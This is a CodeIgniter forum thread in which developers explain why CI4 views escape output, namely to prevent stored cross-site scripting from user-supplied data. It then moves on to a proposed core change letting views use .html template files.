CI4: what the use of esc inside view

CI4: what the use of esc inside view - Printable Version

+- CodeIgniter Forums (https://forum.codeigniter.com)
+-- Forum: CodeIgniter 4 (https://forum.codeigniter.com/forumdisplay.php?fid=28)
+--- Forum: CodeIgniter 4 Discussion (https://forum.codeigniter.com/forumdisplay.php?fid=31)
+--- Thread: CI4: what the use of esc inside view (/showthread.php?tid=71268)

CI4: what the use of esc inside view - anthos1984 - 07-24-2018

What the use of escaping inside renderer or view ?

I don't see any threat because the content is generated by developer's code or developer's template which not intend for harming their users

RE: CI4: what the use of esc inside view - enlivenapp - 07-24-2018

Not all content is generated by the developer's (code/template)...

Don't assume you'll catch everything going in or your customers won't find a way to break something(because they will).

RE: CI4: what the use of esc inside view - Pertti - 07-25-2018

Indeed, it's when users try to add script tags.

For example, if they manage to add script tag to their name, which has no visual representation, so they could hijack admin sessions every time admin user checks anything to do with said user name.

Few years back the common way was to filter through all that and save cleaned values to DB. That does have a drawback that if someone manages to find a way around filters, all old data would need to be checked again, something you as developer, might not even be aware of - giving you false sense of security.

So at the moment the best practice seems to be add it as in in DB, and escape everything when displaying it.

RE: CI4: what the use of esc inside view - elephpantech - 07-25-2018

https://www.phptherightway.com/#data_filtering

RE: CI4: what the use of esc inside view - anthos1984 - 07-25-2018

(07-25-2018, 01:22 AM)Pertti Wrote: Few years back the common way was to filter through all that and save cleaned values to DB. That does have a drawback that if someone manages to find a way around filters, all old data would need to be checked again, something you as developer, might not even be aware of - giving you false sense of security.

Somewhat answer my question.
I get it. But I havent seen live example.

I fork CI4 - View to accept min.html as template view (as in CI3), and wonders if i can skip some checks to eek out performance

RE: CI4: what the use of esc inside view - kilishan - 07-25-2018

(07-25-2018, 04:14 PM)anthos1984 Wrote:
(07-25-2018, 01:22 AM)Pertti Wrote: Few years back the common way was to filter through all that and save cleaned values to DB. That does have a drawback that if someone manages to find a way around filters, all old data would need to be checked again, something you as developer, might not even be aware of - giving you false sense of security.

Somewhat answer my question.
I get it. But I havent seen live example.

I fork CI4 - View to accept min.html as template view (as in CI3), and wonders if i can skip some checks to eek out performance

Don't skimp where security is concerned. And don't worry about performance that much. CI is pretty darned fast. If you have a view that is slow - cache that view and call it done.

RE: CI4: what the use of esc inside view - kilishan - 07-26-2018

(07-25-2018, 04:14 PM)anthos1984 Wrote: I fork CI4 - View to accept min.html as template view (as in CI3), and wonders if i can skip some checks to eek out performance

A question, though - what do you mean "accept min.html as template view"? You should be able to do everything that you could with CI3, and if not, I'd like to see about fixing that in the core.

RE: CI4: what the use of esc inside view - anthos1984 - 07-28-2018

(07-26-2018, 06:17 AM)kilishan Wrote: A question, though - what do you mean "accept min.html as template view"? You should be able to do everything that you could with CI3, and if not, I'd like to see about fixing that in the core.

on CI4 on system/View/View.php has this line (about line 170)

PHP Code:
$this->renderVars['view'] = str_replace('.php', '', $view) . '.php'; 

As I see on docs, it accept template file as php file (You call it views, but I don't want to get confused with view controller or renderer).
If I have .html, then it thinks my file as min.html.php which not exist.

So I change into this (as in CI3)

PHP Code:
$fileExt = pathinfo($view, PATHINFO_EXTENSION);
$realPath = ($fileExt === NULL) ? $view.'.php' : $view;
$this->renderVars['view'] = $realPath; 

So it adds .php only if template file doesn't have extension.
If you ask why I didn't use php? Because minify tool on netbeans can picks .html and rename to .min.html (cannot rename to .php).

we don't need to send comments and empty space, so it will reduce some data to send. Also stripping with php script takes time, better we stripped it before serving the pages to user. Also you can compress some image to reduce more (stripping EXIF data if not needed, compress png, vacuuming svg, etc)

RE: CI4: what the use of esc inside view - kilishan - 07-28-2018

Oh, gotcha. Yeah, that should be fixed. Can you file a Issue over at Github please so that it doesn't get lost?

RE: CI4: what the use of esc inside view - anthos1984 - 07-28-2018

I haven't use github before. But I have uploaded the proposal